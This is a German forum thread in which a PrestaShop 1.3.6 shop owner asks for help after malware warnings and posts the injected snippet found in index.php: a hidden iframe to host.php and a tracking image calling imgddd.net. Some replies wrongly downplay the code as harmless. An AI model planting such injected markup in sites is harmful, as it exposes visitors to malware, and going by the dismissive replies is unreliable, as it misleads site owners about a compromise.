Jump to content

Virus / Trojanermeldung ?


MellowD666

Recommended Posts

Hallo zusammen,

ich habe mich angemeldet weil mir von unterschiedlichen Quellen berichtet wurde, dass mein noch garnicht gestarteter Presta-Shop einen Virus und/oder Trojaner haben soll?

Ich find nichts und kenn mich damit auch nicht aus - ist hier jemand in der Lage eine Schadensquelle über die Seite rauszufinden oder was kann ich tun? :/

Danke für jede Antwort...

Link to comment
Share on other sites

installiere mal den googelbrowser chrome der bringt fehlermeldung wenn was nicht stimmt. oder wenn du einen account bei google hast kannst du deinen server nach malware druchsuchen lassen.

wenn du einen provider hast ist das mit dem virus für deine internetseiten nicht relevant.

Link to comment
Share on other sites

Hallo zusammen,<br/><br/>ich habe mich angemeldet weil mir von unterschiedlichen Quellen berichtet wurde, dass mein noch garnicht gestarteter Presta-Shop einen Virus und/oder Trojaner haben soll? <br/><br/>Ich find nichts und kenn mich damit auch nicht aus - ist hier jemand in der Lage eine Schadensquelle über die Seite rauszufinden oder was kann ich tun? :/<br/><br/>Danke für jede Antwort...

 

Sind die Quellen auch sicher ? Es gibt viele Neider(Konkurrenten) oder auch einfach nur die, die Presta schlecht machen wollen. Davon höre ich sehr viel in den (Entwicklerforen) wo ich verkehre.

Link to comment
Share on other sites

Danke für den Tip mit Google Chrome. Da kommt folgende Meldung:

 

... enthält Inhalte von imgddd.net, einer Website, die bekanntermaßen Malware enthält. Ihr Computer fängt sich möglicherweise einen Virus ein, wenn Sie diese Website besuchen.

Google hat schädliche Software gefunden, die möglicherweise auf Ihrem Computer installiert wird, wenn Sie fortfahren. Wenn Sie diese Website bereits in der Vergangenheit besucht haben oder dieser Website vertrauen, ist es möglich, dass sie vor Kurzem von einem Hacker manipuliert wurde. Sie sollten daher nicht fortfahren und den Vorgang vielleicht morgen wiederholen oder eine andere Website aufrufen.

 

 

Ich kenne imgddd nicht, ist das in Prestashop irgendwie integriert??

 

Googlebot zeigt folgendes ganz am Ende an:

 

<!-- /MODULE Block various links --></div>

</div>

</body>

</html><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>

<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725">

Link to comment
Share on other sites

Danke für den Tip mit Google Chrome. Da kommt folgende Meldung:

 

... enthält Inhalte von imgddd.net, einer Website, die bekanntermaßen Malware enthält. Ihr Computer fängt sich möglicherweise einen Virus ein, wenn Sie diese Website besuchen.

Google hat schädliche Software gefunden, die möglicherweise auf Ihrem Computer installiert wird, wenn Sie fortfahren. Wenn Sie diese Website bereits in der Vergangenheit besucht haben oder dieser Website vertrauen, ist es möglich, dass sie vor Kurzem von einem Hacker manipuliert wurde. Sie sollten daher nicht fortfahren und den Vorgang vielleicht morgen wiederholen oder eine andere Website aufrufen.

 

 

Ich kenne imgddd nicht, ist das in Prestashop irgendwie integriert??

 

Googlebot zeigt folgendes ganz am Ende an:

 

<!-- /MODULE Block various links --></div>

</div>

</body>

</html><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>

<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725">

 

Das ist kein Trojaner oder Virus. Das wurde bereits des öfteren im engl. Forum diskutiert. Es weist nur auf eine mögliche Unsicherheit im System vor, weil ein iframe eingebaut wurde. Jedes iFrame kann schadhaften Code ausführen. Du hast in Deinem Varios-Block-Link irgendeinen Link der auf eine externe Seite verweist. Wie heisst deine Seite. Gerne auch per PM, falls du diese nicht Publik machen möchtest.

 

Auch kenne ich dieses Problem nur von alten PrestaVersionen. Welche Version nutzst du ?

Link to comment
Share on other sites

Nutze Version 1.3.6.0.

 

Habe einen Scan durchgeführt und den Code noch in der index.php entdeckt:

 

?><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>

<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725">

 

Habe diesen Code entfernt, nun blockiert Chrome die Seite nicht mehr. Befürchte aber das es sich möglicherweise wieder iwann selbst neu installiert und irgendwo eine Backdoor-datei drin ist?

 

Zu diesem Problem gibts eine -leider englissprachige- Seite:

 

http://redleg-redleg.blogspot.com/2011/05/cleaning-up-imgaaanet-or-imgbbb-or.html

Link to comment
Share on other sites

Nutze Version 1.3.6.0.

 

Habe einen Scan durchgeführt und den Code noch in der index.php entdeckt:

 

?><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>

<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725">

 

Habe diesen Code entfernt, nun blockiert Chrome die Seite nicht mehr. Befürchte aber das es sich möglicherweise wieder iwann selbst neu installiert und irgendwo eine Backdoor-datei drin ist?

 

Zu diesem Problem gibts eine -leider englissprachige- Seite:

 

http://redleg-redleg.blogspot.com/2011/05/cleaning-up-imgaaanet-or-imgbbb-or.html

 

Also den Block links mit diesem Link habe ich noch nie gesehen. Von wo hasst du dir die 1.3.6. downgeloadet ? War das wirklich eine Offizielle Prestaversion, also von prestashop.com ?

 

Der Link gehört natürlich rausgelöscht, denn er ist nicht Standard. Bei der Standard 1.3.6. war ein iframe eingebaut, der manche Scanner eben eine mögliche unsichere Quelle angezeigt haben. Das wurde mit der 1.3.7 aber bereinigt. Ich würde sowieso ein Update auf 1.4.3 anstreben. Mit 1.4.X ist wieder ein Quantensprung in Sachen Neuigkeiten, Verbesserungen gekommen. Auch wurde der Code komplett Neu überarbeitet und für weitere Updates fit gemacht. Was spricht dagegen ?

Link to comment
Share on other sites

Ich habe das Script von der offiziellen Seite runtergeladen und dann durch deutsche und polnische Sprachpakete modifiziert. Etliches musste ich selbst noch übersetzen und kleinigkeiten in den Seiten anpassen.

So ein Update auf 1.4.3. würde natürlich dadurch einiges an Arbeit kosten und vermutlich muss dann wieder vieles angepasst werden...aber ich werd mal einen Ordner anlegen und einen zweiten Shop dann nach und nach einrichten um dann irgendwann auf die neue Version umstellen zu können :)

 

Frage ist nur ob das Sinn macht wenn in Kürze 1.5. kommt?

Link to comment
Share on other sites

Ich habe das Script von der offiziellen Seite runtergeladen und dann durch deutsche und polnische Sprachpakete modifiziert. Etliches musste ich selbst noch übersetzen und kleinigkeiten in den Seiten anpassen.

So ein Update auf 1.4.3. würde natürlich dadurch einiges an Arbeit kosten und vermutlich muss dann wieder vieles angepasst werden...aber ich werd mal einen Ordner anlegen und einen zweiten Shop dann nach und nach einrichten um dann irgendwann auf die neue Version umstellen zu können :)

 

Frage ist nur ob das Sinn macht wenn in Kürze 1.5. kommt?

 

Sorry, aber der genannte Code ist nicht Original Presta 1.3.6.... Heute Nacht ist offiziell die 1.4.4. rausgekommen. 1.5. kommt frühestens Ende September, wenn überhaupt. Viele User sind gegen eine Presta mit Multishop für alle. Das würde die Handhabung sehr kompliziert machen...

Also vorerst mit 1.4.4. Vorliebe nehmen.

Link to comment
Share on other sites

  • 1 month later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...